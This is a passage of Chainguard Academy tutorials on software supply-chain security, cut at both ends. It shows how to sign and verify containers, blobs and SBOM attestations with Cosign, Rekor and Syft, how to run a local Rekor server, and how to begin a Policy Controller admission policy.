Docker Hub, on the web interface there should be a SHA (secure hash algorithm) added to the tag, enabling you to confirm that your pushed signature was registered. We’ll now manually verify the signature with Cosign. Verify a Container’s Signature We’ll be demonstrating this on the container we just pushed to a registry, but you can also verify a signature on any other signed container using the same steps. While you will more likely be verifying signatures in workloads versus manually, it is still helpful to understand how everything works and is formatted. Let’s use Cosign to verify that the signature exists on the transparency log and matches our expected information. You will need to know some information in order to verify the entry. You’ll need to use the identity flags --certificate-identity which corresponds to the email address of the signer, and --certificate-oidc-issuer which corresponds to the OIDC provider that the signer used. For example, a Gmail account using Google as the OIDC issuer, will be able to be verified with the following command. cosign verify \ --certificate-identity username@gmail.com \ --certificate-oidc-issuer https://accounts.google.com \ docker-username/hello-container Here, we are passing the public key contained in the cosign.pub file to the cosign verify command. You should receive output indicating that the Cosign claims were validated. Verification for index.docker.io/docker-username/hello-container:latest -- The following checks were performed on each of these signatures: - The cosign claims were validated - The signatures were verified against the specified public key [{"critical":{"identity":{"docker-reference":"index.docker.io/docker-username/hello-container"},"image":{"docker-manifest-digest":"sha256:690ecfd885f008330a66d08be13dc6c115a439e1cc935c04d181d7116e198f9c"},"type":"cosign container image signature"},"optional":null}] The whole output will include JSON format which includes the digest of the container image, which is how we can be sure these detached signatures cover the correct image. --- ### How to Sign and Upload Metadata to Rekor URL: https://edu.chainguard.dev/open-source/sigstore/rekor/how-to-sign-and-upload-metadata-to-rekor/ Last Modified: August 20, 2022 Tags: Rekor, Procedural An earlier version of this material was published in the Rekor chapter of the Linux Foundation Sigstore course. This tutorial will walk you through signing and uploading metadata to the Rekor transparency log, which is a project of Sigstore. In order to follow along, you’ll need the rekor-cli installed, which you can accomplish by following the “How to Install the Rekor CLI” tutorial. We will use SSH to sign a text document. SSH is often used to communicate securely over an unsecured network and can also be used to generate public and private keys appropriate for signing an artifact. First, generate a key pair. This command will generate a public key and a private key file. You’ll be able to easily identify the public key because it uses the .pub extension. The command below will create a new file in ~/.ssh called id_ed25519 but you may want to call it something else; you can do that by passing a different filename after the -f flag. ssh-keygen -t ed25519 -f id_ed25519 Then, create a text file called README.txt with your favorite text editor. You can enter as little or as much text in that file as you would like. For example, we can use nano: nano README.txt Then within the file, we can type some text into it, such as the following. [label README.txt] Hello, Rekor! Save and close the file. Next, sign this file with the following command. This command produces a signature file ending in the .sig extension. ssh-keygen -Y sign -n file -f id_ed25519 README.txt You should receive the following output. Signing file README.txt Write signature to README.txt.sig Then, upload this artifact to the public instance of the Rekor log. rekor-cli upload --artifact README.txt --signature README.txt.sig --pki-format=ssh --public-key=id_ed25519.pub The returned value will include a string similar to: https://rekor.sigstore.dev/api/v1/log/entries/83140d699ebc33dc84b702d2f95b209dc71f47a3dce5cce19a197a401852ee97 Save the UUID returned after using this command. In this example, the UUID is 83140d699ebc33dc84b702d2f95b209dc71f47a3dce5cce19a197a401852ee97. Now you can query Rekor for your recently saved entry. Run the following command, replacing UUID with the UUID number obtained in the previous command. rekor-cli get --uuid UUID Once you receive output formatted as a JSON with details on the signature, you will know you have successfully stored a signed metadata entry in Rekor. --- ### How to Sign Blobs and Standard Files with Cosign URL: https://edu.chainguard.dev/open-source/sigstore/cosign/how-to-sign-blobs-with-cosign/ Last Modified: July 29, 2024 Tags: Cosign, Procedural An earlier version of this material was published in the Cosign chapter of the Linux Foundation Sigstore course. Cosign can sign more than just containers. Blobs, or binary large objects, and standard files can be signed in a similar way. You can publish a blob or other artifact to an OCI (Open Container Initiative) registry with Cosign. This tutorial assumes you have a Cosign key pair set up, which you can achieve by following our Introduction to Cosign guide. Navigate to the directory which contains your cosign.pub and cosign.key key pair as generated in the Introduction to Cosign guide. We’ll create an artifact (in this case, a standard file that contains text). We’ll call the file artifact and fill it with the “hello, cosign” text. echo "hello, cosign" > artifact Cosign offers support for signing blobs with the cosign sign-blob and cosign verify-blob commands. To sign our file, we’ll pass our signing key and the name of our file to the cosign sign-blob command. cosign sign-blob --key cosign.key artifact You’ll get output similar to the following, and a prompt to enter your password for your signing key. Using payload from: artifact Enter password for private key: With your password entered, you’ll receive your signature output. MEUCIAb9Jxbbk9w8QF4/m5ADd+AvvT6pm/gp0HE6RMPp3SfOAiEAsWnpkaVZanjhQDyk5b0UPnlsMhodCcvYaGl1sj9exJI= You will need this signature output to verify the artifact signature. Use the cosign verify-blob command and pass in the public key, the signature, and the name of your file. cosign verify-blob --key cosign.pub --signature MEUCIAb9Jxbbk9w8QF4/m5ADd+AvvT6pm/gp0HE6RMPp3SfOAiEAsWnpkaVZanjhQDyk5b0UPnlsMhodCcvYaGl1sj9exJI= artifact Note that the whole output of the signature needed to be passed to this command. You’ll get feedback that the blob’s signature was verified. Verified OK You can also publish the artifact to a container registry such as Docker Hub and sign the artifact’s generated image with Cosign. Running this command will create a new repository in your Docker Hub account . We will call this artifact but you can use an alternate meaningful name for you. cosign upload blob -f artifact docker-username/artifact You’ll receive feedback that the file was uploaded, and it will already have the SHA signature as part of the artifact. Uploading file from [artifact] to [index.docker.io/docker-username/artifact:latest] with media type [text/plain] File [artifact] is available directly at [index.docker.io/v2/docker-username/artifact/blobs/sha256:dcf8ff… Uploaded image to: index.docker.io/docker-username/artifact@sha256:d10846… Being able to sign blobs provides you with the opportunity to sign README files and scripts rather than just containers. This can ensure that every piece of a software project is accounted for through signatures and provenance. --- ### How to Set Up An Instance of Rekor Instance Locally URL: https://edu.chainguard.dev/open-source/sigstore/rekor/install-a-rekor-instance/ Last Modified: August 20, 2022 Tags: Rekor, Procedural An earlier version of this material was published in the Rekor chapter of the Linux Foundation Sigstore course. While individual developers may not generally need to set up their own instance of Rekor, it may be worthwhile to set up your own local instance in order to further understand how Rekor works under the hood. We will have multiple terminal sessions running to set up the Rekor server. You may want to use a tool such as tmux to keep terminal sessions running in the background within the same window. Create and run a database backend To start, we’ll need to create a database backend; while Sigstore accepts several different databases, we’ll work with MariaDB here, so make sure you have it installed. If you are on Debian or Ubuntu, you can install it with the following command. sudo apt install -y mariadb-server If you are on macOS, you can install it with Homebrew. If you don’t already have Homebrew installed, visit brew.sh to set it up. brew install mariadb If you’re using another operating system, review the official MariaDB installation documentation. With MariaDB installed, start the database. For Debian or Ubuntu, you can run: sudo mysql_secure_installation For macOS, you can run: brew services start mariadb && sudo mysql_secure_installation Once you run the above command, you will be prompted to enter your system password, and then will receive a number of prompts as terminal output. You can answer “no” or N to the first question on changing the root password, and “yes” or Y to the remaining prompts. Switch to unix_socket authentication [Y/n] n … Change the root password? [Y/n] n … Remove anonymous users? [Y/n] Y … Disallow root login remotely? [Y/n] Y … Remove test database and access to it? [Y/n] Y … Thanks for using MariaDB! Once you receive the Thanks for using MariaDB! output, you’re ready to create your database. We’ll create a directory to store our work in this example, feel free to create a directory or move into a directory that is meaningful for you. mkdir lf-sigstore && cd $_ From this directory, we’ll clone the Rekor GitHub repository. git clone https://github.com/sigstore/rekor.git Now, move into the directory of Rekor where the database creation script is held. cd $HOME/lf-sigstore/rekor/scripts From here, you can run the database creation script. sudo sh -x createdb.sh You should receive output that indicates that the test database and user were created. + DB=test + USER=test + PASS=zaphod + ROOTPASS= + echo -e 'Creating test database and test user account' -e Creating test database and test user account + mysql + echo -e 'Loading table data..' -e Loading table data.. + mysql -u test -pzaphod -D test At this point, we are ready to move onto installing Trillian. Install and set up Trillian Trillian offers a transparent, append-only, and cryptographically verifiable data store. Trillian will store its records in the MariaDB database we just created. We can install Trillian with Go. go install github.com/google/trillian/cmd/trillian_log_server@latest go install github.com/google/trillian/cmd/trillian_log_signer@latest go install github.com/google/trillian/cmd/createtree@latest We’ll start the Trillian log server, providing the API used by Rekor and the Certificate Transparency frontend. $(go env GOPATH)/bin/trillian_log_server --logtostderr \ -http_endpoint=localhost:8090 -rpc_endpoint=localhost:8091 Your output will indicate that the server has started, and the session will hang. I0629 18:11:27.222341 7395 quota_provider.go:46] Using MySQL QuotaManager I0629 18:11:27.222847 7395 main.go:141] HTTP server starting on localhost:8090 I0629 18:11:27.222851 7395 main.go:180] RPC server starting on localhost:8091 I0629 18:11:27.223757 7395 main.go:188] Deleted tree GC started Next, let’s start the log signer in a new terminal session (while keeping the previous session running), which will sequence data into cryptographically verifiable Merkle trees and periodically check the database. $(go env GOPATH)/bin/trillian_log_signer --logtostderr --force_master --http_endpoint=localhost:8190 -rpc_endpoint=localhost:8191 You’ll receive output that indicates that the log signer has started. This session will also hang. I0629 18:13:42.226319 8513 main.go:98] **** Log Signer Starting **** W0629 18:13:42.227281 8513 main.go:129] **** Acting as master for all logs **** … The Trillian system can support multiple independent Merkle trees. We’ll have Trillian send a request to create a tree and save the log ID for future use. Run the following command in a third terminal session (while keeping the previous two sessions running). $(go env GOPATH)/bin/createtree --admin_server localhost:8091 \ | tee $HOME/lf-sigstore/trillian.log_id In the Trillian log server terminal, you should have output similar to the following: Acting as master for 2 / 2 active logs: master for: <log-2703303398771250657> <log-5836066877012007666> This log string will match the string output of the new terminal session. Trillian uses the gRPC API for requests, which is an open source Remote Procedure Call (RPC) framework that can run in any environment. We can now move onto the Rekor server. Install and set up Redis Rekor server also requires a Redis instance. If you are on Debian or Ubuntu, you can install it with the following command. sudo apt install -y redis-server If you are on macOS, you can install it with Homebrew. If you don’t already have Homebrew installed, visit brew.sh to set it up. brew install redis If you’re using another operating system, review the official Redis documentation. With Redis installed, start it. For Debian or Ubuntu, you can run: sudo systemctl start redis-server For macOS, you can run: brew services start redis Now you can proceed to the next step, where you will install the Rekor server itself. Install Rekor server Rekor provides a restful API-based server with a transparency log that allows for validating and storing. Let’s move into the main rekor/ directory we set up. cd $HOME/lf-sigstore/rekor Now we’ll install the Rekor server from source with Go. go install ./cmd/rekor-cli ./cmd/rekor-server You can now start the Rekor server with Trillian and can leave this running. $(go env GOPATH)/bin/rekor-server serve --trillian_log_server.port=8091 \ --enable_retrieve_api=false Next, we’ll ensure that Rekor is working correctly. Test Rekor Let’s upload a test artifact to Rekor. Open another terminal session and ensure that you are in your main Rekor directory. cd $HOME/lf-sigstore/rekor Now, let’s upload a test artifact to our Rekor instance. $(go env GOPATH)/bin/rekor-cli upload --artifact tests/test_file.txt \ --public-key tests/test_public_key.key \ --signature tests/test_file.sig \ --rekor_server http://localhost:3000 Your terminal will output that you have created a log entry, and where it’s available. Note that your string will be different than what is indicated below. You can input the URL in a browser of your choice to inspect the resulting JSON. Created entry at index 0, available at: http://localhost:3000/api/v1/log/entries/d2f305428d7c222d7b77f56453dd4b6e6851752ecacc78e5992779c8f9b61dd9 Next, we’ll upload the key to our Rekor instance and attach it to the container we built in the Cosign chapter. If you have not created a key or the container, you can do so now, or alternately use a key and software artifact of your choice. $HOME/go/bin/cosign sign \ --key $HOME/cosign.key \ --rekor-url=http://localhost:3000 \ docker-username/hello-container Now you can verify the container against both the mutable OCI attestation and the immutable Rekor record. If you signed your container using Gmail account with Google as the OIDC issuer, you can verify the image with the following command: $HOME/go/bin/cosign verify \ --key $HOME/cosign.pub \ --rekor-url=http://localhost:3000 \ --certificate-identity username@gmail.com \ --certificate-oidc-issuer https://accounts.google.com \ docker-username/hello-container If everything goes well, your resulting output after running the above command should be similar to this: Verification for index.docker.io/docker-username/hello-container:latest -- The following checks were performed on each of these signatures: - The cosign claims were validated - The claims were present in the transparency log - The signatures were integrated into the transparency log when the certificate was valid - The signatures were verified against the specified public key - Any certificates were verified against the Fulcio roots. [{"critical":{"identity":{"docker-reference":"index.docker.io/docker-username/hello-container"},"image":{"docker-manifest-digest":"sha256:35b25714b56211d548b97a858a1485b254228fe9889607246e96ed03ed77017d"},"type":"cosign container image signature"},"optional":{"Bundle":{"SignedEntryTimestamp":"MEUCIG...yoIY=","Payload":{"body":"...","integratedTime":1643917737,"logIndex":1,"logID":"4d2e4...97291"}}}}] You can now also review the logs of your Rekor server, which will give you a URL on your localhost for this second log entry (at log entry 1). Once you are done with your Rekor instance, it is safe to exit each of the terminal sessions. Congratulations, you have set up your own Rekor server! --- ### What is an SBOM (software bill of materials)? URL: https://edu.chainguard.dev/open-source/sbom/what-is-an-sbom/ Last Modified: August 4, 2022 Tags: SBOM, Conceptual Today, software products often contain hundreds to thousands of different open source and third-party software components, many of which are unknown to the software operator or end user. Without an organized way of overseeing these components, it is difficult — or even impossible — to identify and respond to security risks associated with these individual components. Even when software distributors identify vulnerabilities and provide patches, software operators may not have a way to identify vulnerable components quickly enough. Or, in the worst case, operators remain entirely unaware of these vulnerabilities, enabling malicious actors to exploit them without their knowledge. A software bill of materials, or an SBOM (pronounced s-bomb), is a key resource for enabling visibility into the different software components of a codebase. Often described as a list of software “ingredients,” an SBOM is a formally structured list of libraries, modules, licensing, and version information that make up any given piece of software. An SBOM’s purpose is to enable software operators (or any type of software user) to have a comprehensive view of their codebase so that they can quickly identify software components that have known vulnerabilities, or investigate other tracked features like patch status, supplier, license, or version. SBOM use cases SBOMs are leveraged for a variety of purposes, which will likely continue to evolve as new use cases are identified. Some of the most prominent uses of SBOMs today are: Supply chain security: One of the most common uses of SBOMs is enabling users to check for security vulnerabilities in their codebase’s dependencies or base images. If you learn of a vulnerability in one of the libraries your codebase depends on, you can inspect your SBOM to investigate whether your projects are affected. This security utility is further strengthened when used with VEX, the Vulnerability Exploitability eXchange, which enables you to efficiently filter out security alerts that pose no threat to your codebase. Identify software suppliers: SBOMs can be used to identify the suppliers of software components, such as a software author or the individual or entity repackaging the software for redistribution. Supplier identity is often investigated for legal or procurement reasons and there is an evolving debate about which types of distributors should be formally considered as “suppliers”. Licensing: Software projects often pull from tens or hundreds of dependencies whose different licenses may have different restrictions on the use of the code. Being able to track the licenses of your dependencies allows you to stay informed about legal restrictions and licensing compatibility issues, and help you decide which dependencies work best for your project needs. Automate alerts: The machine readable format of SBOMs enables you to create automated alerts to inform you of important events in your codebase, such as security vulnerabilities, missing components, or incompatible dependency licensing. Make open source funding decisions: By understanding which open source software components are used and how frequently across an organization’s codebases, an organization can make more informed decisions about providing funding to open source projects. Find abandoned dependencies: Assuming that an SBOM’s components contain sufficient information (such as package URLs) to link packages with external data, an SBOM consumer could discover if any of the components are open source projects that are abandoned or archived. The user could then take actions such as forking the abandoned project or removing that project as a dependency. The evolution and growing importance of SBOMs For more than a decade, a variety of communities have worked on standards for generating and sharing SBOMs or SBOM-relevant resources, with institutional support from organizations and government agencies like the Linux Foundation and the Department of Commerce. Discussion of SBOMs grew significantly after the White House signed a cybersecurity executive order in May 2021, which in turn led the National Institute of Standards and Technology (NIST) and Department of Commerce to recommend the requirement of SBOMs for all software used by the federal government. This recommendation was based on the logic that SBOMs, had they been in use, would have helped minimize damage of recent large scale software supply chain security incidents such as SolarWinds. More recently, the Department of Homeland Security demonstrated the U.S. government’s sustained interest in SBOMs by supporting and funding the SBOM community’s research and development. Even without requirements, SBOMs are becoming increasingly popular in industry given their utility for managing security risks and licensing, and providing greater visibility into an organization’s codebase. SBOM tools and practices, however, are still maturing and have yet to realize their full potential as an industry practice. While there has been an uptick in the creation and use of SBOMs, many of these SBOMs fail to meet the minimum requirements set forth by the Department of Commerce. For example, in an analysis of 3,000 SBOMs taken from a list of popular Docker containers, Chainguard Labs found that only one percent of SBOMs conformed with the minimum required elements. Nonetheless, proponents of SBOMs (such as Chainguard) remain optimistic about their potential. As industry strengthens SBOM tooling and practices, SBOMs continue to hold great promise for helping secure software supply chains. Open source SBOM tools SBOM creation tools Currently, most SBOMs are generated after the build process using a variety of tools that can scan the software for packages, licensing info, and other information relevant to an SBOM. Syft and Trivy are two popular open source tools for generating SBOMs for containers after the build process, along with bom, an open source tool for creating, viewing, and transforming SBOMs for Kubernetes and other projects. One downside of generating SBOMs after the build process is that scanners typically do not recognize components that are not registered with a package management system. Thus, locally built software components can be missed by the scanner and result in the generation of an SBOM that is missing critical information about the software’s inventory. Ideally, SBOMs should be generated during the build process, which enables a higher level of accuracy given that the SBOM can be generated directly from the software inventory rather than from database records. Though build systems do not typically provide support for this approach, more build tools are beginning to integrate features for generating SBOMs, such as apko, a tool for building and publishing OCI container images. SBOM formats When selecting an SBOM generation tool, it’s important to make sure it supports the format you wish to use. Though there are a variety of available SBOM formats, most SBOMs follow either CycloneDX or SPDX, both of which are approved by the National Telecommunications and Information Administration for fulfilling the executive order’s SBOM requirement. Quality measurement tools An SBOM’s utility is dependent on the quality and comprehensiveness of the information it contains. As noted above, many SBOMs available today fail to meet the NITA’s minimum requirements. The following tools are helpful for assessing the quality of SBOMs you use or create: The open source SBOM Scorecard, created by eBay, analyzes SPDX and CycloneDX formats according to evolving key fields such as spec compliance, licensing information, and package data. The open source NTIA Conformance Checker analyzes whether an SPDX SBOM meets the NTIA’s minimum elements, such as supplier’s name, dependency relationship, and timestamp. Signing SBOMs Signing your SBOM is an important way of assuring end users that it has not been tampered with by a third party and that it comes from a trusted source (you). You can learn more about how to use Cosign, an open source tool for signing containers and other software artifacts, to sign your SBOM in our tutorial. Learn more In this guide, you have learned about the purpose of SBOMs and why proponents see them as a critical building block for software supply chain security. You have also learned about key tools and formats used in SBOM production and consumption, and how to measure the quality of the SBOMs you generate or consume. SBOM practices and tooling are actively evolving. To learn more about SBOMs, check out related research by Chainguard Labs, such as: What Makes a Good SBOM? Are SBOMs Any Good? Preliminary Measurement of the Quality of Open Source Project SBOMs Are SBOMs Good Enough for Government Work? --- ### How to Sign an SBOM with Cosign URL: https://edu.chainguard.dev/open-source/sigstore/cosign/how-to-sign-an-sbom-with-cosign/ Last Modified: October 10, 2024 Tags: Cosign, Procedural, SBOM An earlier version of this material was published in the Cosign chapter of the Linux Foundation Sigstore course. Cosign, developed as part of the Sigstore project, is a command line utility for signing, verifying, storing, and retrieving software artifacts through interface with an OCI (Open Container Initiative) registry. Cosign can be used to sign attestations, or a verifiable assertion or statement about a software artifact. What is an Attestation? An attestation is a cryptographically verifiable statement about a software artifact. Attestations include a subject, a software artifact or artifacts to which the attestation applies, and a predicate, a claim or proposition about the subject. For example, an attestation might assert that a specific container image was built on a specific date using a specific configuration, and that assertion could be cryptographically verified as issuing from a specific organization or entity. Attestations are commonly used for associating useful metadata such as SBOMs or SLSA provenance with a specific artifact such as an OCI container image. In the case of an SBOM (Software Bill of Materials), the attestation proposes that the software artifact contains a specific set of packages. In the case of SLSA provenance, the attestation claims that a specific build environment was used to create the artifact. Attestations verify that a specific trusted entity issued specific metadata about a generated software artifact, and can also indicate that software artifacts and associated documents have not been tampered with. The SLSA project page hosts further detailed information on the attestation model. One common use case for attestations is associating a software artifact, such as an OCI container image, with a software bill of materials (SBOM), an inventory of the components that make up a given software artifact. Increasingly, SBOMs are considered an essential component in maintaining a secure software supply chain. What is a Software Bill of Materials (SBOM? A Software Bill of Materials (SBOM) is a formally structured list of libraries, modules, licenses, and version information that make up any given piece of software. An SBOM provides a comprehensive view of the components contained in a software artifact, allowing for systematic analysis, investigation, and automation. SBOMs are most useful in identifying known vulnerabilities, surveying licenses for compliance, and making decisions based on project status or supplier trust. Read more about SBOMs on Chainguard Academy. Including an SBOM with software you ship can help others trust the provenance and contents of the software. Including your SBOM as an attestation verifies that the SBOM was generated by the same trusted organization that created the software artifact, and that neither the artifact nor its associated metadata and documents have been tampered with. In the following, we’ll generate an SBOM and associate it with a specific OCI container using an attestation generated by Cosign. Creating a Demonstration Image Since we’ll be attaching an SBOM to a container image, we’ll first need to create an example image. We’ll base this image on Chainguard’s wolfi-base, and add a single additional package, the venerable cowsay utility that prints a message along with some ASCII art. We then set the entrypoint so that, when the image is run, a message will be displayed. Create a new folder for our Dockerfile build and change your working directory to that folder: mkdir -p ~/example-image && cd ~/example-image Create a new Dockerfile in the folder using Nano or your preferred text editor: nano Dockerfile Paste the following commands into the file: FROMcgr.dev/chainguard/wolfi-baseRUN apk add cowsayENTRYPOINT ["cowsay", "-f", "tux", "I love FOSS!"]Save the file and close Nano by pressing CTRL + X, y, and ENTER in succession. Since we’ll be pushing to a repository on your Docker Hub account, let’s set a variable to your Docker Hub username that we can use in further commands. DH_USERNAME=<your-username> You can find your username on your Docker Hub account page. If you’re logged in on the command line, you can also run the following command to find your username: docker info | sed '/Username:/!d;s/.* //' 2> /dev/null Finally, let’s build and tag the image with: docker build . -t $DH_USERNAME/example-image You can test out the image by running it: docker run $DH_USERNAME/example-image This should display the “I love FOSS!” message along with some ASCII art. Generating an SBOM with Syft Syft is a tool that allows us to create SBOMs. If you don’t already have Syft, use the following instructions to install this utility. How to Install Syft Syft is a CLI tool for generating a Software Bill of Materials (SBOM). It is created and maintained by Anchore. The recommended way to install Syft is by running a provided installation script. We recommend inspecting this script before running it on your local machine. The following command will download the installation script and install Syft to your /usr/local/bin folder. Depending on your machine’s configuration, you may need to add sudo at the beginning of the second line of the below command or otherwise use elevated permissions to complete the installation. curl -sSfL https://raw.githubusercontent.com/anchore/syft/main/install.sh | \ sh -s -- -b /usr/local/bin Alternately, your can install Syft with Homebrew: brew install syft You can also use Syft directly by pulling and running the official container image from Docker Hub. The following command will pull the Syft container image and use it to scan the offical Python container image from Docker Hub: docker run -it anchore/syft:latest python For more on installing Syft, review the project’s installation instructions on GitHub. Once you have Syft installed, you can generate an SBOM with the syft command, passing in the target image as an argument. For example, the following will use Syft to generate a list of packages present in the official python image on Docker Hub: syft python Now let’s generate an SBOM for example-image, the image we built in the previous section. Run the following Syft command to generate an SBOM in SPDX format: syft $DH_USERNAME/example-image:latest -o spdx-json > example-image.spdx.json What is SPDX? System Package Data Exchange (SPDX) is a file format for representing Software Bills of Materials (SBOMs), or itemized metadata on packages contained in a software artifact. The SPDX specification is based on an open standard and is maintained by the SPDX Project, part of the Linux Foundation. If you take a look at the contents of the file, you will find our installed package, cowsay, represented alongside the other packages already in our base image, wolfi-base. You can also check that cowsay is detected by Syft with the following: syft --quiet $DH_USERNAME/example-image:latest | grep cowsay cowsay 3.04-r0 apk In the next section, we’ll associate this SBOM with our container image using Cosign. Attesting to the SBOM Now that we have our SBOM file, let’s associate it with our image using an attestation. In this attestation, the image will be our subject, and the generated SBOM will serve as our predicate (an assertion about the subject). In this case, we will be attesting that the image contains the packages listed in our SBOM file. Before proceeding, let’s push our image to Docker Hub, since the following commands will refer to the image on the OCI repository. docker push $DH_USERNAME/example-image Our example-image still has attestations derived from our base image, since all Chainguard Containers come with SBOM and SLSA provenance attestations. Let’s remove these attestations with the cosign clean command: cosign clean $DH_USERNAME/example-image We’re now ready to add our attestation. Sigstore recommends referring to the image by digest and not by tag to avoid attesting to the wrong image, and attesting by tag will be removed in a future version of Cosign. The following command will set a variable to the digest of our newly pushed image: DIGEST=$(docker inspect $DH_USERNAME/example-image |jq -c 'first'| jq .RepoDigests | jq -c 'first' | tr -d '"') Alternatively, you can find the digest manually by visiting your repository on Docker Hub. We can now attest using our image as the subject and our generated SBOM as the predicate: cosign attest --type spdxjson \ --predicate example-image.spdx.json \ $DIGEST You will receive the following prompt: Generating ephemeral keys... Retrieving signed certificate... The sigstore service, hosted by sigstore a Series of LF Projects, LLC, is provided pursuant to the Hosted Project Tools Terms of Use, available at https://lfprojects.org/policies/hosted-project-tools-terms-of-use/. Note that if your submission includes personal data associated with this signed artifact, it will be part of an immutable record. This may include the email address associated with the account with which you authenticate your contractual Agreement. This information will be used for signing this artifact and will be stored in public transparency logs and cannot be removed later, and is subject to the Immutable Record notice at https://lfprojects.org/policies/hosted-project-tools-immutable-records/. By typing 'y', you attest that (1) you are not submitting the personal data of any other person; and (2) you understand and agree to the statement and the Agreement terms at the URLs listed above. Are you sure you would like to continue? [y/N] Note the warnings — a record of the attestation will be recorded to an immutable log maintained by the Sigstore project. When you’re ready, press y to agree and attest. Retrieving the Signed SBOM Our example-image in our Docker Hub repository should now bear an attached SBOM as an attestation. Let’s confirm that this is the case by accessing the image’s SBOM from the repository using the cosign download attestation command: cosign download attestation \ $DIGEST | \ jq -r .payload | base64 -d \ | jq .predicate This command will download the in-toto attestation envelope using the cosign download attestation command. This envelope contains information on the attestation’s subject (the image) and predicate (a statement about the subject, in this case the generated SBOM). We decode this envelope from base64, an encoding used to reduce information loss while transferring data, then extract the predicate. The result should be our SBOM in SPDX-JSON: { "SPDXID": "SPDXRef-DOCUMENT", "creationInfo": { "created": "2024-10-09T19:16:20Z", "creators": [ "Organization: Anchore, Inc", "Tool: syft-1.14.0" ], "licenseListVersion": "3.25" }, "dataLicense": "CC0-1.0", "documentNamespace": "https://anchore.com/syft/image/$DH_USERNAME/example-image-15096a2c-e277-40f6-bc6e-93c5a4aff24e", "files": [ { "SPDXID": "SPDXRef-File-bin-busybox-b93a85ec4cd132fa", "checksums": [ [...] If we choose, we can further parse this output so we can examine the cowsay package we added in our Dockerfile: cosign download attestation \ $DIGEST | \ jq -r .payload | base64 -d |\ jq .predicate | jq .packages | \ jq '.[] | select(.name == "cowsay")' { "SPDXID": "SPDXRef-Package-apk-cowsay-f6f3edc220b6705a", "copyrightText": "NOASSERTION", "description": "Configurable talking cow (and a few other creatures)", "downloadLocation": "NONE", "externalRefs": [ { "referenceCategory": "SECURITY", "referenceLocator": "cpe:2.3:a:cowsay:cowsay:3.04-r0:*:*:*:*:*:*:*", "referenceType": "cpe23Type" }, { "referenceCategory": "PACKAGE-MANAGER", "referenceLocator": "pkg:apk/wolfi/cowsay@3.04-r0?arch=x86_64&distro=wolfi-20230201", "referenceType": "purl" } ], "filesAnalyzed": true, "licenseConcluded": "NOASSERTION", "licenseDeclared": "GPL-2.0-or-later", "name": "cowsay", "packageVerificationCode": { "packageVerificationCodeValue": "4f82bdba8e1217f8af0abee5cadc9c2387bf4720" }, "sourceInfo": "acquired package info from APK DB: /lib/apk/db/installed", "supplier": "NOASSERTION", "versionInfo": "3.04-r0" } At this point, we’ve attested to the contents of our image with an SBOM and confirmed that the attestation is attached to the image in our Docker Hub repository. In the next section, we’ll learn how to verify the identity of the entity issuing an attestation. Verifying an Attestation Cosign can also be used to verify the identity of the person or entity issuing an attestation. The following assumes you used GitHub to authenticate when attesting in the previous step. To verify that an attestation was issued by a specific entity, we use the cosign verify-attestation command, specifying the email address of the issuer: cosign verify-attestation \ --certificate-oidc-issuer=https://github.com/login/oauth \ --type https://spdx.dev/Document \ --certificate-identity=emailaddress@emailprovider.com \ $DIGEST If the identity is successfully verified, an initial message similar to the following is printed to stderr: Verification for $DH_USERNAME/example-image@sha256:545a731e803b917daf44e292b03b427427f8090c4e6c4a704e4c18d56c38539f -- The following checks were performed on each of these signatures: - The cosign claims were validated - Existence of the claims in the transparency log was verified offline - The code-signing certificate was verified using trusted certificate authority certificates Certificate subject: <you@domain.com> Certificate issuer URL: https://github.com/login/oauth The remainder of the message consists of an in-toto attestation envelope encoded in base64. If you wish, you can retrieve the predicate from this response: cosign verify-attestation \ --certificate-oidc-issuer=https://github.com/login/oauth \ --type https://spdx.dev/Document \ --certificate-identity=emailaddress@emailprovider.com \ $DIGEST | \ jq -r .payload | \ base64 -d | jq .predicate At this point, you have successfully created an image, generated an SBOM for that image, associated the SBOM with the image as an attestation, and verified the identity of the issuer of the attestation. Using this workflow, you can attest to the contents of images you create, allowing others to understand the provenance of software you ship and enabling others to verify that software artifacts and associated documents originate from you. --- ### Enforce SBOM attestation with Policy Controller URL: https://edu.chainguard.dev/open-source/sigstore/policy-controller/policies/enforce-sbom-attestation-with-policy-controller/ Last Modified: May 10, 2024 This guide demonstrates how to use the Sigstore Policy Controller to verify image attestations before admitting an image into a Kubernetes cluster. In this guide, you will create a ClusterImagePolicy that checks the existence of a SBOM attestation attached to a container image, and then test the admission controller by running a registry.enforce.dev/chainguard/node image with SBOM attestations. Prerequisites To follow along with this guide, you will need the following: A Kubernetes cluster with administrative access. You can set up a local cluster using kind or use an existing cluster. kubectl — to work with your cluster. Install kubectl for your operating system by following the official Kubernetes kubectl documentation. Sigstore Policy Controller installed in your cluster. Follow our How To Install Sigstore Policy Controller guide if you do not have it installed, and be sure to label any namespace that you intend to use with the policy.sigstore.dev/include=true label. Once you have everything in place you can continue to the first step and confirm that the Policy Controller is working as expected. Step 1 - Checking the Policy Controller is Denying Admission Before creating a ClusterImagePolicy, check that the Policy Controller is deployed and that your default namespace is labeled correctly. Run the following to check that the deployment is complete: kubectl -n cosign-system wait --for=condition=Available deployment/policy-controller-webhook && \ kubectl -n cosign-system wait --for=condition=Available deployment/policy-controller-policy-webhook When both deployments are finished, verify the default namespace is using the Policy Controller: kubectl get ns -l policy.sigstore.dev/include=true You should receive output like the following: NAME STATUS AGE default Active 24s Once you are sure that the Policy Controller is deployed and your default namespace is configured to use it, run a pod to make sure admission requests are handled and denied by default: kubectl run --image k8s.gcr.io/pause:3.9 test Since there is no ClusterImagePolicy defined yet, the Policy Controller will deny the admission request with a message like the following: Error from server (BadRequest): admission webhook "policy.sigstore.dev" denied the request: validation failed: no matching policies: spec.containers[0].image k8s.gcr.io/pause@sha256:7031c1b283388d2c2e09b57badb803c05ebed362dc88d84b480cc47f72a21097 In the next step, you will define a policy that verifies Chainguard Containers have a SBOM attestation and apply it to your cluster. Step 2 — Creating a ClusterImagePolicy Now that you have the Policy Controller running in your cluster, and have the default namespace configured to use it, you can now define a ClusterImagePolicy to admit images. Open a new file with nano or your preferred editor: nano /tmp/cip.yaml Copy the following policy to the /tmp/cip.yaml file: # Copyright 2022 Chainguard, Inc.# SPDX-License-Identifier: Apache-2.0apiVersion:policy.sigstore.dev/v1beta1kind:ClusterImagePolicymetadata:name:must-have-spdx-cueannotations:catalog.chainguard.dev/title:Enforce SBOM attestationcatalog.chainguard.dev/description:Enforce a signed SPDX SBOM attestation from a custom keycatalog.chainguard.dev/labels:attestation,cuespec:images:- glob:"**"authorities:- name:my-authoritykeyless:identities:- issuer:"https://token.actions.githubusercontent.com"subject:"https://github.com/chainguard-images/images/.github/workflows/release.yaml@refs/heads/main"attestations:- 